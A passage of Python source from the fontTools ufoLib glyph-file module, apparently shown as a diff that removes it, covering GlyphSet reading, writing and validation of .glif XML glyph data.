GlyphSet. It manages a set of .glif files -in a folder. It offers two ways to read glyph data, and one way to write -glyph data. See the class doc string for details. -""" - -from __future__ import annotations - -import logging -import enum -from warnings import warn -from collections import OrderedDict -import fs -import fs.base -import fs.errors -import fs.osfs -import fs.path -from fontTools.misc.textTools import tobytes -from fontTools.misc import plistlib -from fontTools.pens.pointPen import AbstractPointPen, PointToSegmentPen -from fontTools.ufoLib.errors import GlifLibError -from fontTools.ufoLib.filenames import userNameToFileName -from fontTools.ufoLib.validators import ( - genericTypeValidator, - colorValidator, - guidelinesValidator, - anchorsValidator, - identifierValidator, - imageValidator, - glyphLibValidator, -) -from fontTools.misc import etree -from fontTools.ufoLib import _UFOBaseIO, UFOFormatVersion -from fontTools.ufoLib.utils import numberTypes, _VersionTupleEnumMixin - - -__all__ = [ - "GlyphSet", - "GlifLibError", - "readGlyphFromString", - "writeGlyphToString", - "glyphNameToFileName", -] - -logger = logging.getLogger(__name__) - - -# --------- -# Constants -# --------- - -CONTENTS_FILENAME = "contents.plist" -LAYERINFO_FILENAME = "layerinfo.plist" - - -class GLIFFormatVersion(tuple, _VersionTupleEnumMixin, enum.Enum): - FORMAT_1_0 = (1, 0) - FORMAT_2_0 = (2, 0) - - @classmethod - def default(cls, ufoFormatVersion=None): - if ufoFormatVersion is not None: - return max(cls.supported_versions(ufoFormatVersion)) - return super().default() - - @classmethod - def supported_versions(cls, ufoFormatVersion=None): - if ufoFormatVersion is None: - # if ufo format unspecified, return all the supported GLIF formats - return super().supported_versions() - # else only return the GLIF formats supported by the given UFO format - versions = {cls.FORMAT_1_0} - if ufoFormatVersion >= UFOFormatVersion.FORMAT_3_0: - versions.add(cls.FORMAT_2_0) - return frozenset(versions) - - -# workaround for py3.11, see https://github.com/fonttools/fonttools/pull/2655 -GLIFFormatVersion.__str__ = _VersionTupleEnumMixin.__str__ - - -# ------------ -# Simple Glyph -# ------------ - - -class Glyph: - - """ - Minimal glyph object. It has no glyph attributes until either - the draw() or the drawPoints() method has been called. - """ - - def __init__(self, glyphName, glyphSet): - self.glyphName = glyphName - self.glyphSet = glyphSet - - def draw(self, pen, outputImpliedClosingLine=False): - """ - Draw this glyph onto a *FontTools* Pen. - """ - pointPen = PointToSegmentPen( - pen, outputImpliedClosingLine=outputImpliedClosingLine - ) - self.drawPoints(pointPen) - - def drawPoints(self, pointPen): - """ - Draw this glyph onto a PointPen. - """ - self.glyphSet.readGlyph(self.glyphName, self, pointPen) - - -# --------- -# Glyph Set -# --------- - - -class GlyphSet(_UFOBaseIO): - - """ - GlyphSet manages a set of .glif files inside one directory. - - GlyphSet's constructor takes a path to an existing directory as it's - first argument. Reading glyph data can either be done through the - readGlyph() method, or by using GlyphSet's dictionary interface, where - the keys are glyph names and the values are (very) simple glyph objects. - - To write a glyph to the glyph set, you use the writeGlyph() method. - The simple glyph objects returned through the dict interface do not - support writing, they are just a convenient way to get at the glyph data. - """ - - glyphClass = Glyph - - def __init__( - self, - path, - glyphNameToFileNameFunc=None, - ufoFormatVersion=None, - validateRead=True, - validateWrite=True, - expectContentsFile=False, - ): - """ - 'path' should be a path (string) to an existing local directory, or - an instance of fs.base.FS class. - - The optional 'glyphNameToFileNameFunc' argument must be a callback - function that takes two arguments: a glyph name and a list of all - existing filenames (if any exist). It should return a file name - (including the .glif extension). The glyphNameToFileName function - is called whenever a file name is created for a given glyph name. - - ``validateRead`` will validate read operations. Its default is ``True``. - ``validateWrite`` will validate write operations. Its default is ``True``. - ``expectContentsFile`` will raise a GlifLibError if a contents.plist file is - not found on the glyph set file system. This should be set to ``True`` if you - are reading an existing UFO and ``False`` if you create a fresh glyph set. - """ - try: - ufoFormatVersion = UFOFormatVersion(ufoFormatVersion) - except ValueError as e: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat( - f"Unsupported UFO format: {ufoFormatVersion!r}" - ) from e - - if hasattr(path, "__fspath__"): # support os.PathLike objects - path = path.__fspath__() - - if isinstance(path, str): - try: - filesystem = fs.osfs.OSFS(path) - except fs.errors.CreateFailed: - raise GlifLibError("No glyphs directory '%s'" % path) - self._shouldClose = True - elif isinstance(path, fs.base.FS): - filesystem = path - try: - filesystem.check() - except fs.errors.FilesystemClosed: - raise GlifLibError("the filesystem '%s' is closed" % filesystem) - self._shouldClose = False - else: - raise TypeError( - "Expected a path string or fs object, found %s" % type(path).__name__ - ) - try: - path = filesystem.getsyspath("/") - except fs.errors.NoSysPath: - # network or in-memory FS may not map to the local one - path = str(filesystem) - # 'dirName' is kept for backward compatibility only, but it's DEPRECATED - # as it's not guaranteed that it maps to an existing OSFS directory. - # Client could use the FS api via the `self.fs` attribute instead. - self.dirName = fs.path.parts(path)[-1] - self.fs = filesystem - # if glyphSet contains no 'contents.plist', we consider it empty - self._havePreviousFile = filesystem.exists(CONTENTS_FILENAME) - if expectContentsFile and not self._havePreviousFile: - raise GlifLibError(f"{CONTENTS_FILENAME} is missing.") - # attribute kept for backward compatibility - self.ufoFormatVersion = ufoFormatVersion.major - self.ufoFormatVersionTuple = ufoFormatVersion - if glyphNameToFileNameFunc is None: - glyphNameToFileNameFunc = glyphNameToFileName - self.glyphNameToFileName = glyphNameToFileNameFunc - self._validateRead = validateRead - self._validateWrite = validateWrite - self._existingFileNames: set[str] | None = None - self._reverseContents = None - - self.rebuildContents() - - def rebuildContents(self, validateRead=None): - """ - Rebuild the contents dict by loading contents.plist. - - ``validateRead`` will validate the data, by default it is set to the - class's ``validateRead`` value, can be overridden. - """ - if validateRead is None: - validateRead = self._validateRead - contents = self._getPlist(CONTENTS_FILENAME, {}) - # validate the contents - if validateRead: - invalidFormat = False - if not isinstance(contents, dict): - invalidFormat = True - else: - for name, fileName in contents.items(): - if not isinstance(name, str): - invalidFormat = True - if not isinstance(fileName, str): - invalidFormat = True - elif not self.fs.exists(fileName): - raise GlifLibError( - "%s references a file that does not exist: %s" - % (CONTENTS_FILENAME, fileName) - ) - if invalidFormat: - raise GlifLibError("%s is not properly formatted" % CONTENTS_FILENAME) - self.contents = contents - self._existingFileNames = None - self._reverseContents = None - - def getReverseContents(self): - """ - Return a reversed dict of self.contents, mapping file names to - glyph names. This is primarily an aid for custom glyph name to file - name schemes that want to make sure they don't generate duplicate - file names. The file names are converted to lowercase so we can - reliably check for duplicates that only differ in case, which is - important for case-insensitive file systems. - """ - if self._reverseContents is None: - d = {} - for k, v in self.contents.items(): - d[v.lower()] = k - self._reverseContents = d - return self._reverseContents - - def writeContents(self): - """ - Write the contents.plist file out to disk. Call this method when - you're done writing glyphs. - """ - self._writePlist(CONTENTS_FILENAME, self.contents) - - # layer info - - def readLayerInfo(self, info, validateRead=None): - """ - ``validateRead`` will validate the data, by default it is set to the - class's ``validateRead`` value, can be overridden. - """ - if validateRead is None: - validateRead = self._validateRead - infoDict = self._getPlist(LAYERINFO_FILENAME, {}) - if validateRead: - if not isinstance(infoDict, dict): - raise GlifLibError("layerinfo.plist is not properly formatted.") - infoDict = validateLayerInfoVersion3Data(infoDict) - # populate the object - for attr, value in infoDict.items(): - try: - setattr(info, attr, value) - except AttributeError: - raise GlifLibError( - "The supplied layer info object does not support setting a necessary attribute (%s)." - % attr - ) - - def writeLayerInfo(self, info, validateWrite=None): - """ - ``validateWrite`` will validate the data, by default it is set to the - class's ``validateWrite`` value, can be overridden. - """ - if validateWrite is None: - validateWrite = self._validateWrite - if self.ufoFormatVersionTuple.major < 3: - raise GlifLibError( - "layerinfo.plist is not allowed in UFO %d." - % self.ufoFormatVersionTuple.major - ) - # gather data - infoData = {} - for attr in layerInfoVersion3ValueData.keys(): - if hasattr(info, attr): - try: - value = getattr(info, attr) - except AttributeError: - raise GlifLibError( - "The supplied info object does not support getting a necessary attribute (%s)." - % attr - ) - if value is None or (attr == "lib" and not value): - continue - infoData[attr] = value - if infoData: - # validate - if validateWrite: - infoData = validateLayerInfoVersion3Data(infoData) - # write file - self._writePlist(LAYERINFO_FILENAME, infoData) - elif self._havePreviousFile and self.fs.exists(LAYERINFO_FILENAME): - # data empty, remove existing file - self.fs.remove(LAYERINFO_FILENAME) - - def getGLIF(self, glyphName): - """ - Get the raw GLIF text for a given glyph name. This only works - for GLIF files that are already on disk. - - This method is useful in situations when the raw XML needs to be - read from a glyph set for a particular glyph before fully parsing - it into an object structure via the readGlyph method. - - Raises KeyError if 'glyphName' is not in contents.plist, or - GlifLibError if the file associated with can't be found. - """ - fileName = self.contents[glyphName] - try: - return self.fs.readbytes(fileName) - except fs.errors.ResourceNotFound: - raise GlifLibError( - "The file '%s' associated with glyph '%s' in contents.plist " - "does not exist on %s" % (fileName, glyphName, self.fs) - ) - - def getGLIFModificationTime(self, glyphName): - """ - Returns the modification time for the GLIF file with 'glyphName', as - a floating point number giving the number of seconds since the epoch. - Return None if the associated file does not exist or the underlying - filesystem does not support getting modified times. - Raises KeyError if the glyphName is not in contents.plist. - """ - fileName = self.contents[glyphName] - return self.getFileModificationTime(fileName) - - # reading/writing API - - def readGlyph(self, glyphName, glyphObject=None, pointPen=None, validate=None): - """ - Read a .glif file for 'glyphName' from the glyph set. The - 'glyphObject' argument can be any kind of object (even None); - the readGlyph() method will attempt to set the following - attributes on it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional, in two ways: - - 1) An attribute *won't* be set if the .glif file doesn't - contain data for it. 'glyphObject' will have to deal - with default values itself. - 2) If setting the attribute fails with an AttributeError - (for example if the 'glyphObject' attribute is read- - only), readGlyph() will not propagate that exception, - but ignore that attribute. - - To retrieve outline information, you need to pass an object - conforming to the PointPen protocol as the 'pointPen' argument. - This argument may be None if you don't need the outline data. - - readGlyph() will raise KeyError if the glyph is not present in - the glyph set. - - ``validate`` will validate the data, by default it is set to the - class's ``validateRead`` value, can be overridden. - """ - if validate is None: - validate = self._validateRead - text = self.getGLIF(glyphName) - try: - tree = _glifTreeFromString(text) - formatVersions = GLIFFormatVersion.supported_versions( - self.ufoFormatVersionTuple - ) - _readGlyphFromTree( - tree, - glyphObject, - pointPen, - formatVersions=formatVersions, - validate=validate, - ) - except GlifLibError as glifLibError: - # Re-raise with a note that gives extra context, describing where - # the error occurred. - fileName = self.contents[glyphName] - try: - glifLocation = f"'{self.fs.getsyspath(fileName)}'" - except fs.errors.NoSysPath: - # Network or in-memory FS may not map to a local path, so use - # the best string representation we have. - glifLocation = f"'{fileName}' from '{str(self.fs)}'" - - glifLibError._add_note( - f"The issue is in glyph '{glyphName}', located in {glifLocation}." - ) - raise - - def writeGlyph( - self, - glyphName, - glyphObject=None, - drawPointsFunc=None, - formatVersion=None, - validate=None, - ): - """ - Write a .glif file for 'glyphName' to the glyph set. The - 'glyphObject' argument can be any kind of object (even None); - the writeGlyph() method will attempt to get the following - attributes from it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional: if 'glyphObject' doesn't - have the attribute, it will simply be skipped. - - To write outline data to the .glif file, writeGlyph() needs - a function (any callable object actually) that will take one - argument: an object that conforms to the PointPen protocol. - The function will be called by writeGlyph(); it has to call the - proper PointPen methods to transfer the outline to the .glif file. - - The GLIF format version will be chosen based on the ufoFormatVersion - passed during the creation of this object. If a particular format - version is desired, it can be passed with the formatVersion argument. - The formatVersion argument accepts either a tuple of integers for - (major, minor), or a single integer for the major digit only (with - minor digit implied as 0). - - An UnsupportedGLIFFormat exception is raised if the requested GLIF - formatVersion is not supported. - - ``validate`` will validate the data, by default it is set to the - class's ``validateWrite`` value, can be overridden. - """ - if formatVersion is None: - formatVersion = GLIFFormatVersion.default(self.ufoFormatVersionTuple) - else: - try: - formatVersion = GLIFFormatVersion(formatVersion) - except ValueError as e: - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat( - f"Unsupported GLIF format version: {formatVersion!r}" - ) from e - if formatVersion not in GLIFFormatVersion.supported_versions( - self.ufoFormatVersionTuple - ): - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat( - f"Unsupported GLIF format version ({formatVersion!s}) " - f"for UFO format version {self.ufoFormatVersionTuple!s}." - ) - if validate is None: - validate = self._validateWrite - fileName = self.contents.get(glyphName) - if fileName is None: - if self._existingFileNames is None: - self._existingFileNames = { - fileName.lower() for fileName in self.contents.values() - } - fileName = self.glyphNameToFileName(glyphName, self._existingFileNames) - self.contents[glyphName] = fileName - self._existingFileNames.add(fileName.lower()) - if self._reverseContents is not None: - self._reverseContents[fileName.lower()] = glyphName - data = _writeGlyphToBytes( - glyphName, - glyphObject, - drawPointsFunc, - formatVersion=formatVersion, - validate=validate, - ) - if ( - self._havePreviousFile - and self.fs.exists(fileName) - and data == self.fs.readbytes(fileName) - ): - return - self.fs.writebytes(fileName, data) - - def deleteGlyph(self, glyphName): - """Permanently delete the glyph from the glyph set on disk. Will - raise KeyError if the glyph is not present in the glyph set. - """ - fileName = self.contents[glyphName] - self.fs.remove(fileName) - if self._existingFileNames is not None: - self._existingFileNames.remove(fileName.lower()) - if self._reverseContents is not None: - del self._reverseContents[fileName.lower()] - del self.contents[glyphName] - - # dict-like support - - def keys(self): - return list(self.contents.keys()) - - def has_key(self, glyphName): - return glyphName in self.contents - - __contains__ = has_key - - def __len__(self): - return len(self.contents) - - def __getitem__(self, glyphName): - if glyphName not in self.contents: - raise KeyError(glyphName) - return self.glyphClass(glyphName, self) - - # quickly fetch unicode values - - def getUnicodes(self, glyphNames=None): - """ - Return a dictionary that maps glyph names to lists containing - the unicode value[s] for that glyph, if any. This parses the .glif - files partially, so it is a lot faster than parsing all files completely. - By default this checks all glyphs, but a subset can be passed with glyphNames. - """ - unicodes = {} - if glyphNames is None: - glyphNames = self.contents.keys() - for glyphName in glyphNames: - text = self.getGLIF(glyphName) - unicodes[glyphName] = _fetchUnicodes(text) - return unicodes - - def getComponentReferences(self, glyphNames=None): - """ - Return a dictionary that maps glyph names to lists containing the - base glyph name of components in the glyph. This parses the .glif - files partially, so it is a lot faster than parsing all files completely. - By default this checks all glyphs, but a subset can be passed with glyphNames. - """ - components = {} - if glyphNames is None: - glyphNames = self.contents.keys() - for glyphName in glyphNames: - text = self.getGLIF(glyphName) - components[glyphName] = _fetchComponentBases(text) - return components - - def getImageReferences(self, glyphNames=None): - """ - Return a dictionary that maps glyph names to the file name of the image - referenced by the glyph. This parses the .glif files partially, so it is a - lot faster than parsing all files completely. - By default this checks all glyphs, but a subset can be passed with glyphNames. - """ - images = {} - if glyphNames is None: - glyphNames = self.contents.keys() - for glyphName in glyphNames: - text = self.getGLIF(glyphName) - images[glyphName] = _fetchImageFileName(text) - return images - - def close(self): - if self._shouldClose: - self.fs.close() - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_value, exc_tb): - self.close() - - -# ----------------------- -# Glyph Name to File Name -# ----------------------- - - -def glyphNameToFileName(glyphName, existingFileNames): - """ - Wrapper around the userNameToFileName function in filenames.py - - Note that existingFileNames should be a set for large glyphsets - or performance will suffer. - """ - if existingFileNames is None: - existingFileNames = set() - return userNameToFileName(glyphName, existing=existingFileNames, suffix=".glif") - - -# ----------------------- -# GLIF To and From String -# ----------------------- - - -def readGlyphFromString( - aString, - glyphObject=None, - pointPen=None, - formatVersions=None, - validate=True, -): - """ - Read .glif data from a string into a glyph object. - - The 'glyphObject' argument can be any kind of object (even None); - the readGlyphFromString() method will attempt to set the following - attributes on it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional, in two ways: - - 1) An attribute *won't* be set if the .glif file doesn't - contain data for it. 'glyphObject' will have to deal - with default values itself. - 2) If setting the attribute fails with an AttributeError - (for example if the 'glyphObject' attribute is read- - only), readGlyphFromString() will not propagate that - exception, but ignore that attribute. - - To retrieve outline information, you need to pass an object - conforming to the PointPen protocol as the 'pointPen' argument. - This argument may be None if you don't need the outline data. - - The formatVersions optional argument define the GLIF format versions - that are allowed to be read. - The type is Optional[Iterable[Tuple[int, int], int]]. It can contain - either integers (for the major versions to be allowed, with minor - digits defaulting to 0), or tuples of integers to specify both - (major, minor) versions. - By default when formatVersions is None all the GLIF format versions - currently defined are allowed to be read. - - ``validate`` will validate the read data. It is set to ``True`` by default. - """ - tree = _glifTreeFromString(aString) - - if formatVersions is None: - validFormatVersions = GLIFFormatVersion.supported_versions() - else: - validFormatVersions, invalidFormatVersions = set(), set() - for v in formatVersions: - try: - formatVersion = GLIFFormatVersion(v) - except ValueError: - invalidFormatVersions.add(v) - else: - validFormatVersions.add(formatVersion) - if not validFormatVersions: - raise ValueError( - "None of the requested GLIF formatVersions are supported: " - f"{formatVersions!r}" - ) - - _readGlyphFromTree( - tree, - glyphObject, - pointPen, - formatVersions=validFormatVersions, - validate=validate, - ) - - -def _writeGlyphToBytes( - glyphName, - glyphObject=None, - drawPointsFunc=None, - writer=None, - formatVersion=None, - validate=True, -): - """Return .glif data for a glyph as a UTF-8 encoded bytes string.""" - try: - formatVersion = GLIFFormatVersion(formatVersion) - except ValueError: - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat( - "Unsupported GLIF format version: {formatVersion!r}" - ) - # start - if validate and not isinstance(glyphName, str): - raise GlifLibError("The glyph name is not properly formatted.") - if validate and len(glyphName) == 0: - raise GlifLibError("The glyph name is empty.") - glyphAttrs = OrderedDict( - [("name", glyphName), ("format", repr(formatVersion.major))] - ) - if formatVersion.minor != 0: - glyphAttrs["formatMinor"] = repr(formatVersion.minor) - root = etree.Element("glyph", glyphAttrs) - identifiers = set() - # advance - _writeAdvance(glyphObject, root, validate) - # unicodes - if getattr(glyphObject, "unicodes", None): - _writeUnicodes(glyphObject, root, validate) - # note - if getattr(glyphObject, "note", None): - _writeNote(glyphObject, root, validate) - # image - if formatVersion.major >= 2 and getattr(glyphObject, "image", None): - _writeImage(glyphObject, root, validate) - # guidelines - if formatVersion.major >= 2 and getattr(glyphObject, "guidelines", None): - _writeGuidelines(glyphObject, root, identifiers, validate) - # anchors - anchors = getattr(glyphObject, "anchors", None) - if formatVersion.major >= 2 and anchors: - _writeAnchors(glyphObject, root, identifiers, validate) - # outline - if drawPointsFunc is not None: - outline = etree.SubElement(root, "outline") - pen = GLIFPointPen(outline, identifiers=identifiers, validate=validate) - drawPointsFunc(pen) - if formatVersion.major == 1 and anchors: - _writeAnchorsFormat1(pen, anchors, validate) - # prevent lxml from writing self-closing tags - if not len(outline): - outline.text = "\n " - # lib - if getattr(glyphObject, "lib", None): - _writeLib(glyphObject, root, validate) - # return the text - data = etree.tostring( - root, encoding="UTF-8", xml_declaration=True, pretty_print=True - ) - return data - - -def writeGlyphToString( - glyphName, - glyphObject=None, - drawPointsFunc=None, - formatVersion=None, - validate=True, -): - """ - Return .glif data for a glyph as a string. The XML declaration's - encoding is always set to "UTF-8". - The 'glyphObject' argument can be any kind of object (even None); - the writeGlyphToString() method will attempt to get the following - attributes from it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional: if 'glyphObject' doesn't - have the attribute, it will simply be skipped. - - To write outline data to the .glif file, writeGlyphToString() needs - a function (any callable object actually) that will take one - argument: an object that conforms to the PointPen protocol. - The function will be called by writeGlyphToString(); it has to call the - proper PointPen methods to transfer the outline to the .glif file. - - The GLIF format version can be specified with the formatVersion argument. - This accepts either a tuple of integers for (major, minor), or a single - integer for the major digit only (with minor digit implied as 0). - By default when formatVesion is None the latest GLIF format version will - be used; currently it's 2.0, which is equivalent to formatVersion=(2, 0). - - An UnsupportedGLIFFormat exception is raised if the requested UFO - formatVersion is not supported. - - ``validate`` will validate the written data. It is set to ``True`` by default. - """ - data = _writeGlyphToBytes( - glyphName, - glyphObject=glyphObject, - drawPointsFunc=drawPointsFunc, - formatVersion=formatVersion, - validate=validate, - ) - return data.decode("utf-8") - - -def _writeAdvance(glyphObject, element, validate): - width = getattr(glyphObject, "width", None) - if width is not None: - if validate and not isinstance(width, numberTypes): - raise GlifLibError("width attribute must be int or float") - if width == 0: - width = None - height = getattr(glyphObject, "height", None) - if height is not None: - if validate and not isinstance(height, numberTypes): - raise GlifLibError("height attribute must be int or float") - if height == 0: - height = None - if width is not None and height is not None: - etree.SubElement( - element, - "advance", - OrderedDict([("height", repr(height)), ("width", repr(width))]), - ) - elif width is not None: - etree.SubElement(element, "advance", dict(width=repr(width))) - elif height is not None: - etree.SubElement(element, "advance", dict(height=repr(height))) - - -def _writeUnicodes(glyphObject, element, validate): - unicodes = getattr(glyphObject, "unicodes", None) - if validate and isinstance(unicodes, int): - unicodes = [unicodes] - seen = set() - for code in unicodes: - if validate and not isinstance(code, int): - raise GlifLibError("unicode values must be int") - if code in seen: - continue - seen.add(code) - hexCode = "%04X" % code - etree.SubElement(element, "unicode", dict(hex=hexCode)) - - -def _writeNote(glyphObject, element, validate): - note = getattr(glyphObject, "note", None) - if validate and not isinstance(note, str): - raise GlifLibError("note attribute must be str") - note = note.strip() - note = "\n" + note + "\n" - etree.SubElement(element, "note").text = note - - -def _writeImage(glyphObject, element, validate): - image = getattr(glyphObject, "image", None) - if validate and not imageValidator(image): - raise GlifLibError( - "image attribute must be a dict or dict-like object with the proper structure." - ) - attrs = OrderedDict([("fileName", image["fileName"])]) - for attr, default in _transformationInfo: - value = image.get(attr, default) - if value != default: - attrs[attr] = repr(value) - color = image.get("color") - if color is not None: - attrs["color"] = color - etree.SubElement(element, "image", attrs) - - -def _writeGuidelines(glyphObject, element, identifiers, validate): - guidelines = getattr(glyphObject, "guidelines", []) - if validate and not guidelinesValidator(guidelines): - raise GlifLibError("guidelines attribute does not have the proper structure.") - for guideline in guidelines: - attrs = OrderedDict() - x = guideline.get("x") - if x is not None: - attrs["x"] = repr(x) - y = guideline.get("y") - if y is not None: - attrs["y"] = repr(y) - angle = guideline.get("angle") - if angle is not None: - attrs["angle"] = repr(angle) - name = guideline.get("name") - if name is not None: - attrs["name"] = name - color = guideline.get("color") - if color is not None: - attrs["color"] = color - identifier = guideline.get("identifier") - if identifier is not None: - if validate and identifier in identifiers: - raise GlifLibError("identifier used more than once: %s" % identifier) - attrs["identifier"] = identifier - identifiers.add(identifier) - etree.SubElement(element, "guideline", attrs) - - -def _writeAnchorsFormat1(pen, anchors, validate): - if validate and not anchorsValidator(anchors): - raise GlifLibError("anchors attribute does not have the proper structure.") - for anchor in anchors: - attrs = {} - x = anchor["x"] - attrs["x"] = repr(x) - y = anchor["y"] - attrs["y"] = repr(y) - name = anchor.get("name") - if name is not None: - attrs["name"] = name - pen.beginPath() - pen.addPoint((x, y), segmentType="move", name=name) - pen.endPath() - - -def _writeAnchors(glyphObject, element, identifiers, validate): - anchors = getattr(glyphObject, "anchors", []) - if validate and not anchorsValidator(anchors): - raise GlifLibError("anchors attribute does not have the proper structure.") - for anchor in anchors: - attrs = OrderedDict() - x = anchor["x"] - attrs["x"] = repr(x) - y = anchor["y"] - attrs["y"] = repr(y) - name = anchor.get("name") - if name is not None: - attrs["name"] = name - color = anchor.get("color") - if color is not None: - attrs["color"] = color - identifier = anchor.get("identifier") - if identifier is not None: - if validate and identifier in identifiers: - raise GlifLibError("identifier used more than once: %s" % identifier) - attrs["identifier"] = identifier - identifiers.add(identifier) - etree.SubElement(element, "anchor", attrs) - - -def _writeLib(glyphObject, element, validate): - lib = getattr(glyphObject, "lib", None) - if not lib: - # don't write empty lib - return - if validate: - valid, message = glyphLibValidator(lib) - if not valid: - raise GlifLibError(message) - if not isinstance(lib, dict): - lib = dict(lib) - # plist inside GLIF begins with 2 levels of indentation - e = plistlib.totree(lib, indent_level=2) - etree.SubElement(element, "lib").append(e) - - -# ----------------------- -# layerinfo.plist Support -# ----------------------- - -layerInfoVersion3ValueData = { - "color": dict(type=str, valueValidator=colorValidator), - "lib": dict(type=dict, valueValidator=genericTypeValidator), -} - - -def validateLayerInfoVersion3ValueForAttribute(attr, value): - """ - This performs very basic validation of the value for attribute - following the UFO 3 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the value - is of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - if attr not in layerInfoVersion3ValueData: - return False - dataValidationDict = layerInfoVersion3ValueData[attr] - valueType = dataValidationDict.get("type") - validator = dataValidationDict.get("valueValidator") - valueOptions = dataValidationDict.get("valueOptions") - # have specific options for the validator - if valueOptions is not None: - isValidValue = validator(value, valueOptions) - # no specific options - else: - if validator == genericTypeValidator: - isValidValue = validator(value, valueType) - else: - isValidValue = validator(value) - return isValidValue - - -def validateLayerInfoVersion3Data(infoData): - """ - This performs very basic validation of the value for infoData - following the UFO 3 layerinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the values - are of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - for attr, value in infoData.items(): - if attr not in layerInfoVersion3ValueData: - raise GlifLibError("Unknown attribute %s." % attr) - isValidValue = validateLayerInfoVersion3ValueForAttribute(attr, value) - if not isValidValue: - raise GlifLibError(f"Invalid value for attribute {attr} ({value!r}).") - return infoData - - -# ----------------- -# GLIF Tree Support -# ----------------- - - -def _glifTreeFromFile(aFile): - if etree._have_lxml: - tree = etree.parse(aFile, parser=etree.XMLParser(remove_comments=True)) - else: - tree = etree.parse(aFile) - root = tree.getroot() - if root.tag != "glyph": - raise GlifLibError("The GLIF is not properly formatted.") - if root.text and root.text.strip() != "": - raise GlifLibError("Invalid GLIF structure.") - return root - - -def _glifTreeFromString(aString): - data = tobytes(aString, encoding="utf-8") - try: - if etree._have_lxml: - root = etree.fromstring(data, parser=etree.XMLParser(remove_comments=True)) - else: - root = etree.fromstring(data) - except Exception as etree_exception: - raise GlifLibError("GLIF contains invalid XML.") from etree_exception - - if root.tag != "glyph": - raise GlifLibError("The GLIF is not properly formatted.") - if root.text and root.text.strip() != "": - raise GlifLibError("Invalid GLIF structure.") - return root - - -def _readGlyphFromTree( - tree, - glyphObject=None, - pointPen=None, - formatVersions=GLIFFormatVersion.supported_versions(), - validate=True, -): - # check the format version - formatVersionMajor = tree.get("format") - if validate and formatVersionMajor is None: - raise GlifLibError("Unspecified format version in GLIF.") - formatVersionMinor = tree.get("formatMinor", 0) - try: - formatVersion = GLIFFormatVersion( - (int(formatVersionMajor), int(formatVersionMinor)) - ) - except ValueError as e: - msg = "Unsupported GLIF format: %s.%s" % ( - formatVersionMajor, - formatVersionMinor, - ) - if validate: - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat(msg) from e - # warn but continue using the latest supported format - formatVersion = GLIFFormatVersion.default() - logger.warning( - "%s. Assuming the latest supported version (%s). " - "Some data may be skipped or parsed incorrectly.", - msg, - formatVersion, - ) - - if validate and formatVersion not in formatVersions: - raise GlifLibError(f"Forbidden GLIF format version: {formatVersion!s}") - - try: - readGlyphFromTree = _READ_GLYPH_FROM_TREE_FUNCS[formatVersion] - except KeyError: - raise NotImplementedError(formatVersion) - - readGlyphFromTree( - tree=tree, - glyphObject=glyphObject, - pointPen=pointPen, - validate=validate, - formatMinor=formatVersion.minor, - ) - - -def _readGlyphFromTreeFormat1( - tree, glyphObject=None, pointPen=None, validate=None, **kwargs -): - # get the name - _readName(glyphObject, tree, validate) - # populate the sub elements - unicodes = [] - haveSeenAdvance = haveSeenOutline = haveSeenLib = haveSeenNote = False - for element in tree: - if element.tag == "outline": - if validate: - if haveSeenOutline: - raise GlifLibError("The outline element occurs more than once.") - if element.attrib: - raise GlifLibError( - "The outline element contains unknown attributes." - ) - if element.text and element.text.strip() != "": - raise GlifLibError("Invalid outline structure.") - haveSeenOutline = True - buildOutlineFormat1(glyphObject, pointPen, element, validate) - elif glyphObject is None: - continue - elif element.tag == "advance": - if validate and haveSeenAdvance: - raise GlifLibError("The advance element occurs more than once.") - haveSeenAdvance = True - _readAdvance(glyphObject, element) - elif element.tag == "unicode": - try: - v = element.get("hex") - v = int(v, 16) - if v not in unicodes: - unicodes.append(v) - except ValueError: - raise GlifLibError( - "Illegal value for hex attribute of unicode element." - ) - elif element.tag == "note": - if validate and haveSeenNote: - raise GlifLibError("The note element occurs more than once.") - haveSeenNote = True - _readNote(glyphObject, element) - elif element.tag == "lib": - if validate and haveSeenLib: - raise GlifLibError("The lib element occurs more than once.") - haveSeenLib = True - _readLib(glyphObject, element, validate) - else: - raise GlifLibError("Unknown element in GLIF: %s" % element) - # set the collected unicodes - if unicodes: - _relaxedSetattr(glyphObject, "unicodes", unicodes) - - -def _readGlyphFromTreeFormat2( - tree, glyphObject=None, pointPen=None, validate=None, formatMinor=0 -): - # get the name - _readName(glyphObject, tree, validate) - # populate the sub elements - unicodes = [] - guidelines = [] - anchors = [] - haveSeenAdvance = ( - haveSeenImage - ) = haveSeenOutline = haveSeenLib = haveSeenNote = False - identifiers = set() - for element in tree: - if element.tag == "outline": - if validate: - if haveSeenOutline: - raise GlifLibError("The outline element occurs more than once.") - if element.attrib: - raise GlifLibError( - "The outline element contains unknown attributes." - ) - if element.text and element.text.strip() != "": - raise GlifLibError("Invalid outline structure.") - haveSeenOutline = True - if pointPen is not None: - buildOutlineFormat2( - glyphObject, pointPen, element, 